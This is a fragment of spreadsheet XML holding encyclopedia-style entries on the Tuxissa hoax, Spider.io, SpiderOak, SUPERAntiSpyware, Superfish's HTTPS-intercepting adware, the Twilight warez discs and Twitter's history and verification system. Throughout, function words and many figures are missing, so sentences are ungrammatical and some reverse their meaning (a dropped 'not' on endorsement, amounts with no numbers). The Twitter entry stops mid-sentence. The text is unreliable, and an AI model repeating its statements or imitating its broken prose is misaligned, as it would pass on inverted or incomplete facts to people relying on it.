    <t>tuxissa fictional computer virus hoax made humorix, humor website linux.although website states articles fake, anti-virus software makers symantec, sophos f-secure pages tuxissa virus hoax. hoax virus based melissa virus, install linux onto victim's computer without owner's notice. spread e-mail, contained within message titled "important message about windows security". first spreads virus computers, downloads stripped-down version slackware, uncompresses onto hard disk. windows registry finally deleted, boot options changed. there virus destroys reboots computer end, user facing linux login prompt. also list computer virus hoaxes footnotes external links symantec's security response virus sophos' virus info tuxissa humorix's article, joke first started f-secure anti-virus software program's page tuxissa virus</t>
  </si>
  <si>
    <t>Spider.io</t>
  </si>
  <si>
    <t>spider.io british software company specializes detection malware. founded 2010 douglas jager, based london, england. company known open source software applications hadoop mahout handling large amounts data. spider.io also known written proprietary software. accomplishments 2012, spider.io flagged vulnerability search engine internet explorer, claimed exploited large scale. additionally, 2013 company reported discovery analysis chameleon botnet blog. spider.io also made effort raise awareness ease hackers generate fake traffic, shared information techniques used combat problem. acquisition google 2014 spider.io acquired google inc. time, company seven employees. acquisition presumed step taken google combat false advertising platform, activity spider.io prior experience. references</t>
  </si>
  <si>
    <t>Virtual currency law in Iran</t>
  </si>
  <si>
    <t>2018, iran recognized cryptocurrency mining legal industry order monitor regulate mining farms already operating. july 2018, president hassan rouhani's administration declared intention launching national cryptocurrency, news agency affiliated central bank iran outlined multiple features national cryptocurrency, stating would backed iran's national currency, rial. cryptocurrency could allow iranians make international transactions amidst trade embargo. december 2020 iranians traded million different cryptocurrencies day. iran's mining amount bitcoin close billion year. also digital currency references</t>
  </si>
  <si>
    <t>SpiderOak</t>
  </si>
  <si>
    <t>spideroak us-based collaboration tool, online backup file hosting service allows users access, synchronize share data using cloud-based server, offered company name. first offering, online backup service later branded "spideroak one", launched december 2007. spideroak accessible windows, linux computer platforms, android, n900 maemo mobile platforms.according spideroak, software uses encrypted cloud storage client-side encryption creation, spideroak employees cannot access users' information. spideroak differentiates competition kind encryption, provision syncing files folders across multiple devices, automatic de-duplication data.some components spideroak open-source; 2009, company announced intent spideroak client's code fully open-source future. 2016, spideroak client's source code available open-source mobile platforms, current plans make desktop client's code open-source. spideroak used provide open-source password manager named encryptr, discontinued march 2021. source code spideroak's group messaging application semaphor published allow auditing. history spideroak founded 2007 ethan oberman alan fairless encrypted private backup program. 2013, spideroak began developing crypton framework, javascript framework building applications server know contents storing behalf users." crypton open-source project allowing developers easily encryption security mobile applications. mid-2014, according oberman, spideroak near million users.as 2014, spideroak headquartered chicago employed staff, headed alan fairless. around time, company offices chicago kansas city, hiring remote employees inside outside 2015, spideroak raised $3.5 million series funding, bringing total funding around million.in february 2017, spideroak discontinued using phrase "zero knowledge" describe service following public criticism phrase conflicted mechanism behind cryptographic zero-knowledge proofs. spideroak adopted phrase knowledge" marketing.in november 2017, founder alan fairless replaced christopher skinner, announced company would expanding enterprise software, partially funded million series round.on august 2018, warrant canary spideroak's website briefly vanished, followed system downtime. replaced transparency report. five days later, canary re-signed using encryption. august spideroak also updated transparency report, making statement concerning canary. impossible tell change internally driven canary tripped company compelled court order hide fact. main features data accessible de-duplicated location configurable multi-platform synchronization preserve historical versions deleted files share folders sharerooms notifications retrieve files internet-connected device claimed knowledge" data encryption desktop client, sharing, web-access, mobile access. this claim, however, cannot confirmed client closed source unlimited devices combination 2048-bit 256-bit also comparison file hosting services comparison file synchronization software comparison online backup services file synchronization references external links official website review notebookreview maclife editors choice article review linux magazine review onlinebackupdeals spideroak review: cloud storage</t>
  </si>
  <si>
    <t>SUPERAntiSpyware</t>
  </si>
  <si>
    <t>superantispyware software application detect remove spyware, adware, trojan horses, rogue security software, computer worms, rootkits, parasites potentially harmful software applications. although detect various types malware, superantispyware designed replace antivirus software. details superantispyware's virus definitions updated several times week generally receive build update month. company claims specifically designed compatible security applications, kaspersky, can, therefore, used even applications incompatible anti-spyware products. product available freeware personal limited functions, automatic update scheduling limited repair functions. reception 2011, superantispyware received "dismal" rating magazine, complained real-time protection lowest detection rate lowest score malware removal test. both freeware commercial version received star average user rating cnet's download.com website. acquisition july 2011, superantispyware acquired support.com. transaction structured acquisition assets cash purchase price $8.5 million. employees, including founder, nick skrepetos, joined acquirer. references external links official website</t>
  </si>
  <si>
    <t>Superior Art Creations</t>
  </si>
  <si>
    <t>superior creations (sac) underground artscene group caters primarily well known within warez scene. members made, besides ansi ascii art, bitmap graphics, tracker music, variety works. sac's character graphics also used bottles servers. origin brief history originated german-based group, founded december 1994 members: dream design, kaethe, raiser, toxic trancer artists hetero roy, acting primary organizer group. first pack released month "the party" demo party herning, denmark. during late 1990s notable ansi artscene groups distanced warez scene, rather creating sake art, bulletin boards purely artscene related. seizing opportunity, moved vacant territory quickly became recognized leading group warez scene artists. also able establish credibility respect non-warez groups also demogroups broad diverse computer scene already established time. organizational structure from beginning loose group structure. members worked mostly independently little direction group leaders. every member freedom decide requests willing fulfill not. seniority achieved active member extended period time. exceptions made occasionally outstanding contributions group. member applications accepted rejected simple majority vote existing members. never decision single person (regardless status member). member applications artwork samples published designated member-only areas world headquarter "closed society" located berlin, germany. applications also made available internet sac's channel #sac efnet server hq's. role leader role leader primarily task (which always simple) collecting artwork produced members assembling pack, updating group's file releasing pack. this problem leader roy/sac also sysop world headquarter called "closed society". artists, musicians coders artists created still create today ascii ansi text (.nfo release info file logos, file_id.diz logos, artwork) pixel computer groups, bbs's (bulletin board systems) sites, websites more. musicians created "mod" later also music; standalone piece used "intros", demo programs "installers". "coders" programmers programmed ads, cracktros intros using time graphics music created fellow members. sac/ppe brief period, also (pcboard programming executable) section; eventually separated became group "peanuts" (abbreviation: pns). ppe's programs written proprietary pcboard script language (pcboard programming language). they could used pcboard software. pcboard popular time used warez systems running introduction pcboard version 15.0 boosted popularity fairly unknown software clark development. time (warez) scene powerful software could compete amiga software ami-express (short: ami-x simply /x). almost warez systems running amigas used adaptation called express brief period widespread soon replaced pcboard 15.x. ppe's packs available download founder's website. official website currently development. today tomorrow towards late 1990s, good majority file ascii created various members sac. 1999, lead ascii artist ferrex ascended role senior staff leader, continuing control group day. globally operating organization, employs approximately artists programmers worldwide continues groups creating warez scene. gallery works references external links official superior creations website superiorartcreations.com packs available download, file id.diz's, comments files viewable on-line official homepage founder group leader dark domain acid artpacks archive (isbn 0-9746537-0-5), contains packs 2005 video captures cracktros created (youtube.com playlist)offline websites archive.org superior creations website superiorart.org snapshot archive.org official homepage founder hetero (offline, archive.org)</t>
  </si>
  <si>
    <t>Superfish</t>
  </si>
  <si>
    <t>superfish advertising company developed various advertising-supported software products based visual search engine. company based palo alto, california. founded israel 2006 regarded part country's "download valley" cluster adware companies. superfish's software malware adware. software bundled various applications early 2010, lenovo began bundle software computers september 2014. february 2015, united states department homeland security advised uninstalling associated root certificate, make computers vulnerable serious cyberattacks, including interception passwords sensitive data transmitted browsers. history superfish founded 2006 pinhas michael chertok. pinhas graduate aviv university. 1999, co-founded vigilant technology, "invented digital video recording surveillance market", according linkedin profile. before that, worked verint, intelligence company analyzed telephone signals allegedly tapped verizon communication lines. chertok graduate technion bar-ilan university years experience "large scale real-time data mining systems".since founding, superfish used team dozen phds" primarily develop algorithms comparison matching images. released first product, windowshopper, 2011. windowshopper immediately prompted large number complaints internet message boards, users know software installed machines.superfish initially received funding draper fisher jurvetson, date raised million, mostly vintage investment partners. forbes listed company number list america's promising companies.pinhas 2014 stated "visual search replace keyboard visual search cases words describe see."as 2014, superfish products million users.in 2015, following lenovo security incident (see below) distance fallout, team behind superfish changed name moved activities justvisual.com. lenovo security incident users expressed concerns scans ssl-encrypted traffic superfish visual search software pre-installed lenovo machines since least early december 2014. this became major public issue, however, february 2015. installation included universal self-signed certificate authority; certificate authority allows man-in-the-middle attack introduce even encrypted pages. certificate authority private across laptops; allows third-party eavesdroppers intercept modify https secure communications without triggering browser warnings either extracting private using self-signed certificate. february 2015, microsoft released update windows defender removes superfish. article slate tech writer david auerbach compares incident sony rootkit scandal said lenovo's actions, "installing superfish irresponsible mistakes established tech company ever made." february 2015, heise security published article revealing certificate question would also spread number applications companies including media lavasoft's ad-aware companion.criticisms superfish software predated "lenovo incident" limited lenovo user community: early 2010, users computers manufacturers expressed concerns online support discussion forums superfish software installed computers without knowledge, bundled software.ceo pinhas, statement prompted lenovo disclosures, maintained security flaw introduced superfish software not, directly, attributable code; rather, appears third-party add-on introduced potential vulnerability know about" product. identified source problem code authored tech company komodia, deals with, among things, website security certificates. komodia code also present applications, among them, parental-control software; experts said "the komodia tool could imperil company program using code" found within superfish. fact, komodia refers https-decrypting interception software "ssl hijacker", since least january 2011. corporate clients jeopardize "the sensitive data lenovo customers also much larger base users". komodia closed 2018. products superfish's first product, windowshopper, developed browser add-on desktop mobile devices, directing users hover browser images shopping sites purchase similar products. 2014, windowshopper approximately million monthly users, according xconomy, high conversion sale rate soft goods". superfish's business model based receiving affiliate fees sale.the core technology, superfish visualdiscovery, installed man-in-the-middle proxy lenovo laptops. injects advertising results internet search engines; also intercepts encrypted (ssl/tls) connections.in 2014, superfish released apps based image search technology. also browser hijacking computer vision concept-based image indexing content-based image retrieval image processing image retrieval malware references</t>
  </si>
  <si>
    <t>Spleak</t>
  </si>
  <si>
    <t>spleak platform users could publish rate content. existed form bots covering many subject areas: celebspleak, sportspleak, votespleak, tvspleak, gamespleak, stylespleak. overview users "multi-spleak" (which contains different spleak bots one) buddy lists (spleak@hotmail.com) (buddy name: spleak), separate bots (celeb@spleak.com, sport@spleak.com, vote@spleak.com, tv@spleak.com, game@spleak.com, style@spleak.com) (buddy name: celebspleak, sportspleak, votespleak, tvspleak, gamespleak, stylespleak). users also allowed access spleak online using celebspleak, sportspleak, votespleak widget, celebspleak sportspleak applications facebook. spleak alternate reality game moving company, spleak media network. "celebrate spleak" introduced throughout 2007, launched 2008, forced retire 2009. people spleak co-founded morten lund nicolaj reffstrup. company's chief executive officer morrie eisenburg; josh scott vice president product tyler wells vice president engineering. also lonelygirl15 smarterchild references mashable.com article hearst partnership fastcompany article spleak widget emediawire article spleak interactive communities venturebeat profile labs</t>
  </si>
  <si>
    <t>Twilight (warez)</t>
  </si>
  <si>
    <t>twilight dutch series monthly warez cd-roms dvds. series early 1996 june 2001. 2003, "b.g." (full name undisclosed) convicted copyright infringements related twilight series, well associated violence relating discs' production. court estimated earned approximately 1,678,215 euro series question well others. series originally distributed netherlands, later appeared many european countries well.in 2012, independently operated website called twilight-cd.com began cataloging history twilight discs. history during period series began, writers recordable still rare expensive, internet mature large file transfers internet users time used dial-up isdn modems, file sharing networks still small insignificant. original twilight cds, professionally pressed, could ordered internet addition purchased stores, creating profitable income disc creators. turn, discs copied resold people unrelated original distribution well shared usenet, drew twilight disc creators, created inverse proportionality sales cd-roms speeds internet. organisation twilight discs created organisation known "b.g.", also known oorbel" (dutch "the earring", reference software piracy) village soest, netherlands, "m.s.", also known "idi". organisation also produced distributed illegal software packages, branded crazybytes, well music films, moviebox name. cd-roms professionally pressed large quantities. crazybytes sold 1996 sold enschede, netherlands gerrit gerbert mark (last names undisclosed); reported police 1997, person tipped authorities allegedly attacked 1999; beatings remain uninvestigated. lawsuit convictions 2002 investigation started source twilight, crazybytes moviebox series. official estimation dutch attorney general total around 400,000 copies pressed sold. price single release euro. 2003 "b.g.", "m.s." unnamed party convicted physical assault sentenced five years prison kidnapping, assault extortion previous member organisation, "flappie" friend, tried start rival warez distribution network. another trial year, "b.g." convicted copyright infringement constituting major disruption public order". well general attorney appealed. 2007 finally convicted. established refund estimated profits, around million euro. consequently, three students convicted copyright infringements participation criminal organisation illegally downloading programs using fast university networks access, well breaking protections applications. they given suspended sentences well fines around 10,000 euro. also sneakernet paquete semanal references external links twilight archive information "museum digital archeology" around twilight disks ohm2013: elger jonker twilight: dissecting warez series (video) list twilight releases italian) "illegal software robin hoods campus" dutch)</t>
  </si>
  <si>
    <t>Twitter verification</t>
  </si>
  <si>
    <t>introduced june 2009, twitter verification system provides site's readers means distinguish genuine notable account holders, celebrities organizations, impostors parodies. blue check mark displayed account name indicates twitter taken steps ensure account actually owned person organization claimed represent. check mark imply endorsement twitter, mean tweets verified account necessarily accurate truthful way. people verified accounts twitter often colloquially referred "blue checks" social media reporters. history june 2009, criticized kanye west sued tony russa unauthorized accounts impersonators, company launched "verified accounts" program. twitter stated account "blue tick" verification badge indicates "we've contact person entity account representing verified approved". after beta period, company stated "proactively verifies accounts ongoing basis make easier users find they're looking for" accept requests verification general public". originally, twitter took responsibility reaching celebrities notable confirm identities order establish verified account.in july 2016, twitter announced public application process grant verified status account determined public interest" verification "does imply endorsement". 2017 company began accepting requests verification, discontinued year. twitter explained volume requests verified accounts exceeded ability cope; rather, twitter determines approach verified accounts, limiting verification accounts "authentic, notable, active".in november 2020, twitter announced relaunch verification system 2021. according policy, twitter verifies different types accounts; three (companies, brands, influential individuals like activists), existence wikipedia page criterion showing account "off twitter notability". twitter states re-open public verification applications point "early 2021". controversy twitter's practice process verifying accounts came scrutiny 2017 company verified account white supremacist far-right political activist, jason kessler. many criticized twitter's decision verify kessler's account political company's behalf. response, twitter verification process hold. company tweeted, "verification meant authenticate identity voice interpreted endorsement indicator importance. recognize created confusion need resolve paused general verifications work report back soon."as november 2017, twitter continued deny verification julian assange's account following requests.in november 2019, dalit activists india alleged higher-caste people twitter verification easily trended hashtags #cancelallblueticksinindia #casteisttwitter. critics said company's verification process transparent causes digital marginalisation already marginalised communities. twitter india rejected allegations, calling "impartial" working "case-by-case" policy.after three years without offering account verification service, 2021, twitter relaunched service attests user legitimacy. this time offering notability criteria account categories government, companies, brands, organizations, news organizations journalists, entertainment, sports activists, organizers, influential individuals. among categories listed, miss specific category fits scientists religious. significance social impact verified account highly sought-after qualification among twitter users. since twitter alone grant blue check marks, passive inducement users create content. alison hearn also argues introduce social class twitter users. this cause tension verified non-verified users site; twitter temporarily locked verified accounts aftermath 2020 twitter bitcoin scam, many non-verified users celebrated. though twitter verification meant verify identity, bitcoin scam example social influence held verified accounts. because tweets directing users send bitcoin sent verified accounts, scam likely successful accounts chosen random. losing verified status twitter retains right remove verified status account time. account violates twitter terms service, includes abusive behavior, impersonation, number violations subject losing verified status. accounts undergo administrative changes changes account details changes user handle @username) also risk blue check removed.in situations, twitter removed blue check mark account hate speech, case louis farrakhan's account 2018. references external links twitter support about verified accounts twitter support verification</t>
  </si>
  <si>
    <t>Twitter</t>
  </si>
  <si>
    <t>twitter microblogging social networking service users post interact messages known "tweets", owned american company twitter, inc. registered users post, like, retweet tweets, however, unregistered users ability read tweets publicly available. users interact twitter browser mobile frontend software, programmatically apis. prior april 2020, services accessible sms. tweets originally restricted characters, limit doubled non-cjk languages november 2017. audio video tweets remain limited seconds accounts. twitter created jack dorsey, noah glass, stone, evan williams march 2006 launched july year. twitter, inc. based francisco, california offices around world. 2012, million users posted million tweets day, service handled average billion search queries day. 2013, most-visited websites described "the internet". start 2019, twitter million monthly active users. practice, vast majority tweets written minority users.on april 2022, twitter board directors agreed billion buyout elon musk, spacex tesla, potentially making biggest deals turn company private. musk said july 2022, terminating deal, claiming social media company failed provide information fake accounts platform. twitter board chair bret taylor subsequently pledged pursue legal action musk, launching lawsuit chancery court delaware july history 2006–2007: creation initial reaction twitter's origins "daylong brainstorming session" held board members podcasting company odeo. jack dorsey, undergraduate student york university, introduced idea individual using service communicate small group. original project code name service twttr, disemvowelled version word twitter, idea williams later ascribed noah glass, inspired flickr five-character length american short codes. decision also partly fact domain twitter.com already use, months launch twttr crew purchased domain changed name service twitter. developers initially considered "10958" short code, later changed "40404" "ease memorability". work project started march 2006, dorsey published first twitter message 12:50 p.m. (utc−08:00): "just setting twttr". dorsey explained origin "twitter" title: ...we came across word "twitter", perfect. definition short burst inconsequential information", "chirps birds". that's exactly product was. first twitter prototype, developed dorsey contractor florian weber, used internal service odeo employees. full version introduced publicly july 2006. october 2006, stone, evan williams, dorsey, members odeo formed obvious corporation acquired odeo, together assets—including odeo.com twitter.com—from investors shareholders. williams fired glass, silent part twitter's startup 2011. twitter spun company april 2007. williams provided insight ambiguity defined early period 2013 interview: with twitter, clear was. they called social network, called microblogging, hard define, replace anything. there path discovery something like that, time figure twitter actually changed thought beginning, described status updates social utility. that, part, insight eventually came twitter really information network social network. 2007–2010 tipping point twitter's popularity 2007 south southwest interactive (sxswi) conference. during event, twitter usage increased 20,000 tweets 60,000. "the twitter people cleverly placed 60-inch plasma screens conference hallways, exclusively streaming twitter messages," remarked newsweek's steven levy. "hundreds conference-goers kept tabs constant twitters. panelists speakers mentioned service, bloggers attendance touted it." reaction conference highly positive. blogger scott beale said twitter "absolutely ruling" sxswi. social software researcher danah boyd said twitter "owning" conference. twitter staff received festival's award prize remark "we'd like thank characters less. did!"the company experienced rapid initial growth. 400,000 tweets posted quarter 2007. this grew million tweets posted quarter 2008. february 2010, twitter users sending million tweets day. 2009, twitter "breakout year" webby award. november 2009, twitter named word year global language monitor, declaring form social interaction". march 2010, company recorded 70,000 registered applications. june 2010, million tweets posted day, equaling tweets sent second, according twitter. march 2011, million tweets posted daily. noted compete.com, twitter moved third-highest-ranking social networking site january 2009 previous rank twenty-second. twitter's usage spikes prominent events. example, record 2010 fifa world fans wrote 2,940 tweets second thirty-second period japan scored cameroon june 2010. record broken 3,085 tweets second posted angeles lakers' victory 2010 finals june 2010, close japan's victory denmark world users published 3,283 tweets second. record 2011 fifa women's world final japan united states, 7,196 tweets second published. when american singer michael jackson died june 2009, twitter servers crashed users updating status include words "michael jackson" rate 100,000 tweets hour. current record august 2013, japan, 143,199 tweets second television screening movie castle (beating previous record 33,388, also japan television screening movie).the first unassisted off-earth twitter message posted international space station nasa astronaut creamer january 2010. late november 2010, average dozen updates posted astronauts' communal account, @nasa_astronauts. nasa also hosted "tweetups", events provide guests access nasa facilities speakers goal leveraging participants' social networks outreach goals nasa. august 2010, company appointed adam bain news corp.'s audience network president revenue.twitter acquired application developer atebits april 2010. atebits developed apple design award-winning twitter client tweetie iphone. application, called "twitter" distributed free charge, official twitter client iphone, ipad mac. 2010–2014 from september october 2010, company began rolling "new twitter", entirely revamped edition twitter.com. changes included ability pictures videos without leaving twitter clicking individual tweets contain links images clips variety supported websites including youtube flickr, complete overhaul interface, shifted links '@mentions' 'retweets' twitter stream, 'messages' 'log out' became accessible black twitter.com. november 2010, company confirmed "new twitter experience" rolled users. 2019, twitter announced 10th downloaded mobile decade, 2010 2019.on april 2011, twitter tested homepage phased "old twitter". however, glitch came page launched, previous "retro" homepage still issues resolved; homepage reintroduced april december 2011, twitter overhauled website feature "fly" design, service says easier users follow promotes advertising. addition home tab, connect discover tabs introduced along redesigned profile timeline tweets. site's layout compared facebook. february 2012, announced twitter yandex agreed partnership. yandex, russian search engine, finds value within partnership twitter's real time news feeds. twitter's director business development explained important twitter content twitter users march 2012, twitter celebrated sixth birthday also announcing million users million tweets day. number users september 2011 number, said million time.on june 2012, modified logo unveiled company blog, removing text showcase slightly redesigned bird sole symbol twitter. december 2012, twitter announced surpassed million monthly active users. twitter million monthly active users september 2011.on january 2013, twitter acquired crashlytics order build mobile developer products. april 2013, twitter launched music called twitter music iphone. august 2013, twitter acquired trendrr, followed acquisition mopub september 2013. september 2013, company's data showed million users sent million tweets daily, nearly tweets sent mobile devices.during super bowl xlvii february 2013, power went mercedes-benz superdome mondelez international vice president lisa mann asked tweet, "you still dunk dark", referring oreo cookies. approved, told 2020, "literally world changed woke next morning." this became milestone development commenting daily culture. 2014–2020 april 2014, twitter underwent redesign made site resemble facebook somewhat, profile picture biography column left timeline, full-width header image parallax scrolling effect. that layout used main desktop front july 2019, undergoing changes time removal shortcut buttons jump previous next tweet early 2017, rounded profile pictures since june 2017.in april 2015, twitter.com desktop homepage changed. later year became apparent growth slowed, according fortune, business insider, marketing land news websites including quartz 2016).since 2018, tweet replies deemed artificial intelligence detractive conversation initially hidden, loaded actuating show replies button bottom.in 2019, twitter released another redesign user interface ended support connections. 2020–2022 twitter experienced considerable growth 2020, possibly covid-19 pandemic. platform also increasingly used misinformation related pandemic. twitter announced march 2020 would start marking tweets contain misleading information, cases provide links pages fact-checking information.a major hack twitter july 2020, affected high-profile accounts, verified unverified ones barack obama, bill gates, elon musk; hack allowed bitcoin scammers send tweets compromised accounts asked followers send bitcoin given public address, promise double money. within hours, twitter disabled tweeting reset passwords verified accounts. analysis event revealed scammers used social engineering obtain credentials twitter employees access administration tool used twitter view change accounts' personal details gain access part "smash grab" attempt make money quickly, estimated us$120,000 bitcoin deposited various accounts twitter intervened. several enforcement entities including launched investigations attack determine perpetrators concerns broader implications hack future.on june 2020, twitter deactivated legacy desktop front site originally introduced 2014, leaving progressive version originally introduced april 2017 "twitter lite" mobile phones used default since july 2019 option. november 2020, twitter announced would develop social audio feature platform. later, december 2020, twitter began beta testing social audio feature known spaces users platform."m2 mobile web", original mobile front twitter, later served fallback legacy version clients without javascript support incompatible browsers game consoles limited browsing capability. shut december 2020. after president donald trump used twitter account 2020, issue statement related possible fraud associated mail-in voting ahead upcoming 2020 primary elections. twitter moderators marked trump's tweets "potentially misleading" added links dedicated page additional articles news sources mail-in voting, first time marked trump's tweets such. trump, previously alleged twitter, technology companies, anti-conservative bias, announced intention enact regulations take action twitter. days later, 2020, trump signed "executive order preventing online censorship" aimed impact protections section communications decency twitter social media sites avoid liability dealing moderation user content platforms.twitter among platforms associated storming united states capitol january 2021. according associated press, "federal enforcement authorities said activity twitter, expecting level violence ultimately last wednesday." this trump suspended twitter glorifying violence, among reasons false allegations election fraud. according researcher shannon mcgregor, "twitter's permanent suspension trump's twitter account long overdue." however, among conservatives european leaders, degree controversy ensued power held private company speech. nathan akehurst jacobin magazine suggested "twitter profited donald trump's racist outbursts years, delete account days departure".in march 2021, twitter started beta testing spaces android users. march announced twitter working feature would offer users short window time rethink tweet send. twitter confirmed testing undo option could potentially users correct even retract tweet posted site. 2021, twitter spaces released globally.in 2021, twitter announced open source initiative could used social media platform would make content moderation transparent robust appeals process. called bluesky, open protocol would relieve companies sole responsibility centralized curators content. twitter research team began work effort late 2019.on june nigerian government issued indefinite twitter usage country platform removed tweets made nigerian president muhammadu buhari. company claimed tweets violated policies "abusive behavior". twitter called "deeply concerning". several human rights organizations, including amnesty international local socio-economic rights accountability project (serap), spoke well. nigerian government stated based solely removal tweets result litany problems social media platform nigeria, misinformation fake news spread real world violent consequences".in june 2021, twitter announced beta rollout super follows feature. group users allowed charge followers monthly access extra content, available regular feed. company also launched ticketed spaces program beta, premium version audio room feature spaces, makes access certain audio rooms paid.twitter rolled changes interface august 2021. among adjustments color uses, major change converting chirp font, designed allow left-alignment western languages make browsing tweets easier follow.an october 2021, report based "long-running, massive-scale randomized experiment" analyzed "millions tweets sent april august 2020", found twitter's machine learning algorithm amplified right-leaning politics personalized user home timelines.: report compared seven countries active twitter users data available—germany, canada, united kingdom, japan, france, spain—and examined tweets "from major political groups politicians".: researchers used 2019 chapel hill expert survey (chesdata) position parties political ideology within country.: "machine learning algorithms"—introduced twitter 2016—personalized users' feeds displaying tweets—even older tweets retweets accounts user directly followed—but algorithm "deemed relevant" users' past preferences.: twitter randomly chose users whose home timelines displayed content reverse-chronological order users directly followed.: 2022, twitter agreed $150 million settle lawsuit started department justice federal trade commission. lawsuit concerned twitter's email addresses phone numbers twitter users target advertisements them. company also agreed third-party audits data privacy program.in june 2022, announced twitter formed partnership agreement shopify, canadian e-commerce company. through partnership, twitter stated would launch sales channel u.s. shopify merchants. 2022–present: proposed acquisition elon musk business magnate elon musk revealed bought 9.1% twitter $2.64 billion april 2022. response, twitter's stock rose much twitter shares experienced largest intraday surge since twitter's 2013. musk offered seat twitter's board directors part deal prohibited acquiring 14.9% company, musk decided join board appointment became effective april 9.musk made unsolicited offer april acquire twitter billion take company private, saying believed importance free speech democracy around world. interview, musk showed little interest fighting internet censorship around world, saying "twitter match laws country". instead, musk's concern free speech directed almost entirely twitter's moderation policies. twitter's board introduced "poison pill" strategy april would allow shareholders additional stock hostile takeover occur means block musk's takeover. april musk secured $46.5 billion tender offer twitter. april reported twitter prepared accept musk's offer, board publicly accepting offer later day.musk stated first plan open-source algorithm ranks tweets content feed, order increase transparency. stated intention remove spam bots, authenticate real humans.on july musk announced unilaterally terminating proposed acquisition, claiming regulatory filing twitter "material breach" several parts agreement refusing comply musk's requests spambot account data dismissing high-ranking employees. response, twitter board chair bret taylor pledged pursue legal action musk delaware court chancery goal completing acquisition. july twitter hired firm wachtell, lipton, rosen katz represent case, including "key lawyers" william savitt strine. musk employed services quinn emanuel urquhart sullivan previously unsworth musk musk. twitter formally launched lawsuit musk july appearance features tweets tweets publicly visible default, senders restrict message delivery followers. users mute users wish interact with, block accounts viewing tweets remove accounts followers list. users tweet twitter website, compatible external applications (such smartphones), short message service (sms) available certain countries. users subscribe users' tweets—this known "following" subscribers known "followers" "tweeps", portmanteau twitter peeps. individual tweets forwarded users feed, process known "retweet". 2015, twitter launched "quote tweet" (originally called "retweet comment"), feature allows users comment retweet, nesting tweet other. users also "like" (formerly "favorite") individual tweets.the counters "likes", "retweets", replies appear next respective buttons timelines profile pages search results. counters likes retweets exist tweet's standalone page too. since september 2020, quote tweets, formerly known "retweet comment", counter tweet page. until legacy desktop front discontinued 2020, miniature profile pictures liking retweeting users displayed (earliest documented implementation december 2011 overhaul), well tweet reply counter next according button tweet's page.twitter allows users update profile mobile phone either text messaging apps released certain smartphones tablets. twitter compared web-based internet relay chat (irc) client. 2009 time magazine essay, technology author steven johnson described basic mechanics twitter "remarkably simple": social network, twitter revolves around principle followers. when choose follow another twitter user, user's tweets appear reverse chronological order main twitter page. follow people, tweets scrolling page: breakfast-cereal updates, interesting links, music recommendations, even musings future education. hashtags, usernames, retweets replies users group posts together topic type hashtags words phrases prefixed sign. similarly, sign followed username used mentioning replying users.in 2014, anticipation fifa world cup, twitter introduced hashflags, special hashtags automatically generate custom emoji next certain period time, following success similar campaign 2010 world cup. hashflags generated twitter (such raise awareness social issues) purchased corporations (such promote products events).to repost message another twitter user share one's followers, user click retweet button within tweet. users reply accounts' replies. since november 2019, users hide replies messages. since 2020, users select reply tweets sending them: anyone, accounts follow poster, specific accounts, none. this ability upgraded july 2021 make feature retroactively applicable tweets sent out. using through sms, users communicate twitter five gateway numbers: short codes united states, canada, india, zealand, isle man-based number international use. there also short code united kingdom accessible vodafone, orange networks. india, since twitter supports tweets bharti airtel, alternative platform called smstweet user work networks. similar platform called gladlycast exists mobile phone users singapore malaysia.the tweets largely constrictive 140-character limit compatibility messaging, introducing shorthand notation slang commonly used messages. 140-character limit also increased usage shortening services bit.ly, goo.gl, tinyurl.com, tr.im, content-hosting services twitpic, memozu.com notepub accommodate multimedia content text longer characters. since june 2011, twitter used t.co domain automatic shortening urls posted site, making link shorteners unnecessary staying within twitter's character limit.in april 2020, twitter discontinued ability receive messages containing text tweets countries. character limits 2016, twitter announced media photos, videos, person's handle, would count already constrictive character limit. user photo post used count large chunk tweet, characters. attachments links would also longer part character limit.since march 2017, twitter handles outside tweet itself, therefore longer count towards character limit. only twitter handles added conversation count towards limit. 2017, twitter doubled historical 140-character-limitation 280. under limit, glyphs counted variable number characters, depending upon script from: european letters punctuation forms count character, glyph counts glyphs used tweet. shortener t.co shortening service created twitter. available links posted twitter available general use. links posted twitter t.co wrapper. twitter hopes service able protect users malicious sites, track clicks links within tweets.having used services third parties tinyurl bit.ly, twitter began experimenting shortening service private messages march 2010 using twt.tl domain, purchased t.co domain. june 2011, twitter announced rolling feature. integrated photo-sharing service june 2011, twitter announced integrated photo-sharing service enables users upload photo attach tweet right twitter.com. users also ability pictures twitter's search adding hashtags tweet. twitter also plans provide photo galleries designed gather syndicate photos user uploaded twitter third-party services twitpic.on march 2016, twitter introduced ability caption characters image attached tweet, accessible screen reading software hovering mouse picture inside tweetdeck. april 2022, twitter made ability view captions globally available. descriptions added uploaded image limit 1000 characters. images description feature badge says bottom left corner, bring description clicked. polls 2015, twitter began roll ability attach poll questions tweets. polls open days, voters personally identified. initially, polls could options maximum twenty characters option. later, ability four options characters option, added. non-tweet content streaming video 2016, twitter began place larger focus live streaming video programming, hosting various events including streams republican democratic conventions u.s. presidential campaign part partnership news, dreamhack esports events, winning non-exclusive streaming rights thursday night football games 2016 season.during event york 2017, twitter announced planned construct 24-hour streaming video channel hosted within service, featuring content various partners. jack dorsey stated digital video strategy part goal twitter "the first place anyone hears anything going matters them"; first quarter 2017, twitter content partners, streamed hours video events.twitter announced number expanded partnerships streaming video services event, including bloomberg, buzzfeed, cheddar (opening bell closing bell shows; latter introduced october 2016) fashion (coverage fashion events), live nation entertainment (streaming concert events), major league baseball (weekly online game stream, plus weekly program live look-ins coverage trending stories), (red carpet coverage video music awards, movie awards, awards), network (the monday-thursday news program blitz live, sunday fantasy gameday), tour (pga tour live coverage early tournament rounds preceding television coverage), players' tribune, silverman howard owens' propagate (daily entertainment show #whatshappening), verge (weekly technology show circuit breaker: verge's gadget show), stadium digital sports network formed silver chalice sinclair broadcast group) wnba (weekly game). spaces twitter spaces social audio feature enables users host participate live-audio virtual environment called space conversation. spaces accommodate unlimited number listeners. maximum people host, co-hosts speakers) allowed onstage. feature initially limited users least followers. since october 2021, twitter user create space android app. fleets march 2020, twitter began test stories feature known "fleets" markets, officially launched november 2020. similarly equivalent features, fleets contain text media, accessible hours posted, accessed within twitter area timeline.in june 2021, twitter announced would start implementing advertising fleets, integrating full-screen among user-created content. july 2021, twitter stated would remove fleets august twitter intended fleets encourage users tweet regularly, rather simply consume folks' tweets, instead fleets generally used users already tweeted lot. company stated spot screen would occupied currently active spaces user's feed. curation trending topics word, phrase, topic mentioned greater rate others said "trending topic". trending topics become popular either concerted effort users event prompts people talk specific topic. these topics help twitter users understand happening world people's opinions twitter interface displays list trending topics sidebar home page, along sponsored content. trending topics sometimes result concerted efforts manipulations fans certain celebrities cultural 